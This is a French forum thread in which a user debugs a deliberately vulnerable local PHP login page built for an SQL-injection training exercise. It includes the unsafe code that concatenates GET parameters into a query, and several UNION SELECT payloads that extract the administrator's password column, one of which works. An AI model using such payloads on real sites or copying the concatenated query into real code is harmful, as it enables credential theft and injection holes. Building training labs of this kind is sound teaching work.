Requête SQL basic et problème de privilège

Version imprimable

19/11/2012, 10h21
Severrakh

Requête SQL basic et problème de privilège
Bonjour tout le monde,

J'ai créé un petit site en local pour faire du pentest (un tp d'SQLi pour mon association en ce qui concerne ce petit exercice).
J'ai donc aucun soucis concernant le bypass de login.
Cependant, lorsque je cherche à récupérer des données ou agir sur une table, il y a un soucis.
J'injecte la requête suivante :
Code:

1 2 3 4 5 6 7 8 SELECT * FROM users WHERE login='zzz' UNION SELECT passwd FROM users WHERE login='Administrateur' LIMIT 1,1
Et j'ai un retour :

Citation:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\test_SQLi\index.php on line 13

Le soucis viens donc pas de mysql_fetch_array() mais du mysql-query qui le précède.

D'après ce que je sais, mysql_query retourne false (et donc valeur booléenne, d'où le soucis) si l'user n'a pas les privilèges pour agir sur la table.

Mon soucis, j'utilise un user au quel j'ai donné la totalité des droits sur toute mes bases de données.

Si quelqu'un a une piste pour régler ce soucis...
19/11/2012, 11h01
CinePhil

Il vaut mieux éviter la guerre des étoiles ! :P
En l'occurrence, ici, tu rapatries toutes les colonnes de la table dans la première requête de l'UNION et seulement une colonne dans la seconde donc ça ne peut pas fonctionner.

D'ailleurs, je trouve le sens de la requête bizarre ! 8O
Elle signifie, en gros :
"Sélectionner l'utilisateur de login 'zzz' et le mot de passe de l'administrateur." 8O

Concernant le message d'erreur, rien ne dit que ce soit un problème de privilège. Quel utilisateur MySQL l'application utilise t-elle pour se connecter à la BDD ? C'est de cet utilisateur là dont il faut s'occuper des privilèges sur la BDD.

Pour pouvoir analyser le problème, il faudrait donner le code PHP de la connexion à la BDD (en masquant bien sûr le mot de passe et l'URL) et le code de soumission de la requête à MySQL ainsi que le code de son exploitation jusqu'au mysql_fetch-array.

Tout d'abord, merci d'avoir rectifié mes erreurs ! ;)

Pour le contexte :
Il s'agit d'une exploitation de faille SQL exclusivement en local, je peux donc donner le code php sans soucis.

Ma requête à pour but de récupérer le contenu de la table passwd du login Administrateur.

Voici le code :
Code:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 <?php if (isset($_GET['login'])) { $db = mysql_connect("localhost","pentest1","*****"); // Connexion à la base de données. (on va masquer le mot de passe pour la forme ! ) mysql_select_db("pentest1"); // Sélection de la base de données utilisée. $pwd=md5($_GET['pass']); $sql="SELECT * FROM users WHERE login ='".$_GET['login']." ' AND passwd='".$pwd."';"; echo $sql.'<br/>'; $req=mysql_query($sql)or die(mysql_error()); $data=mysql_fetch_array($req); if (is_array($data) ) { ?> Bienvenue <?php echo $data['login']; ?><br/><br/>Cle : <?php echo '"'.$data['key'].'"'; ?> <?php } else { echo "LOGIN / PASSWORD INVALIDE <br/>"; ?>
Oui, c'est un code bien moche mais c'est le but dans ce contexte ! ^^
Après réflexion, ce n'est pas un soucis de privilège, j'ai ajouter un or die(mysql_error() pour connaitre le soucis.. ça vient au niveau de ma requête SQL.. qui marchait pourtant sur une autre plateforme.

Mon Wamp utilise la version 5.5.24 de MySQL

PS : Merci pour la guerre des étoiles, je ne connaissais absolument pas cette optimisation.

19/11/2012, 11h21
CinePhil

:resolu: ?
19/11/2012, 11h35
Severrakh

Non, ce n'est pas résolu, je ne vois toujours pas pourquoi ma requête n'est pas exécuté sur cette plateforme.. Ma requête étant pourtant correct il me semble pour ce que je cherche à faire.
19/11/2012, 11h44
CinePhil

Symptômes ?
- message d'erreur ?
- pas de résultat en retour ?
- résultat erroné ?

Puisque tu fais un echo $sql, quelle est la requête réellement envoyée ?
Les variables $_GET sont-elles bien valorisées ?

Je vois quand même un petit truc :

Code:

WHERE login ='".$_GET['login']." ' AND

Tu as un espace entre le login et l'apostrophe de fin de chaîne, du coup, si le login réel est 'Severrakh', tu soumets à la requête la recherche du login 'Severrakh ' et il ne trouve pas l'utilisateur !
19/11/2012, 12h08
Severrakh
l'echo $sql est :
Code:

1 2 $sql="SELECT * FROM users WHERE login ='".$_GET['login']." ' AND passwd='".$pwd."';";
Dans le formulaire j'injecte au niveau du login :

Code:

UNION SELECT passwd FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Dans le but de récupérer le contenu, l'erreur retourné est : The used SELECT statements have a different number of columns.

J'ai donc utilisé :

Code:

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Dans ce cas j'ai une connexion à la page, sous aucun login et aucun contenu.

Dans le reste des situations essayé j'ai une erreur de syntaxe en rapport avec ma version d'SQL.

Chose étrange étant donné qu'il y a une semaine mon tp fonctionnait, mais sur une autre structure.

Pour les variables GET c'est ok

J'ai réglé pour l'espace avant ' mais je n'avais pas remarqué de soucis sur ce point là.
19/11/2012, 12h26
CinePhil

Citation:

Dans le reste des situations essayé j'ai une erreur de syntaxe en rapport avec ma version d'SQL.

Si je comprends bien, ton exemple du premier message avec l'UNION fonctionne mais tu as d'autres cas qui ne fonctionnent pas ?
19/11/2012, 12h34
Severrakh

Pas exactement,

Dans le premier exemple l'erreur retourné est : The used SELECT statements have a different number of columns

Du coup je remplace par :

Code:

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Et là je n'ai pas d'erreur mais il n'affiche rien..
Et c'est à partir de là que je bloque et tourne en rond.
19/11/2012, 12h46
CinePhil

Que donne le résultat du echo $sql ?
19/11/2012, 12h49
Severrakh

Code:

SELECT * FROM users WHERE login ='zzz' UNION SELECT passwd FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;' AND passwd='d41d8cd98f00b204e9800998ecf8427e';

Citation:

The used SELECT statements have a different number of columns

Voici le retour.
Je coupe la fin de la requête part -- ;
Le hash du pass est affiché dans la requête, mais le but est de récupérer le pass via une requête SQL injecté dans le formulaire .. le echo $sql n'est là qu'à but d'aide.
19/11/2012, 13h06
CinePhil

L'erreur est logique, pour la raison que j'ai évoquée dans ma première réponse.

Mais apparemment, tu as essayé aussi autrement :

Citation:

Du coup je remplace par :

Code:

UNION SELECT null,null,passwd,null FROM users WHERE login='Administrateur' LIMIT 1,1 -- ;

Et là, tu n'as pas d'erreur ? Et quoi ? Une page blanche ?
19/11/2012, 16h06
Severrakh

Merci, je viens de voir ce qui allait pas,

ça fonctionne bien mieux avec :

Code:

UNION SELECT passwd,passwd,passwd,passwd FROM users WHERE login='Administrateur' -- ;

En réfléchissant par la logique je ne pensai pas qu'il remplacerai les affichages de login par le contenu de passwd.
SQL affiche donc le contenu d'une colonne d'un table à la place d'une autre si on le demande de cette manière ?

Merci pour ton aide.
19/11/2012, 16h21
CinePhil
Dans une requête UNION, seuls les noms de colonnes de la première requête sont pris en compte pour nommer les colonnes de résultat.
Code:

1 2 3 4 5 6 7 8 SELECT usr_id, usr_login, usr_passwd, usr_key FROM users WHERE usr_login = 'zzz' UNION SELECT passwd, passwd, passwd, passwd FROM users WHERE usr_login = 'Administrateur' LIMIT 1, 1
=> Résultat :
```
usr_id	usr_login	usr_passwd	usr_key
1	'Administrateur'	'son_mdp' '12345'
```
D'une manière générale et dans un cas plus normal de requête, si tu utilises des alias pour nommer les colonnes de résultat, ce n'est pas la peine de répéter les alias sur toutes les requêtes unies :
Code:

1 2 3 4 5 6 7 8 9 SELECT col1 AS colonne_1, col2 AS colonne_2 FROM une_table UNION SELECT col3, col4 FROM une_autre_table
Le résultat affichera les colonnes "colonne_1" et "colonne_2".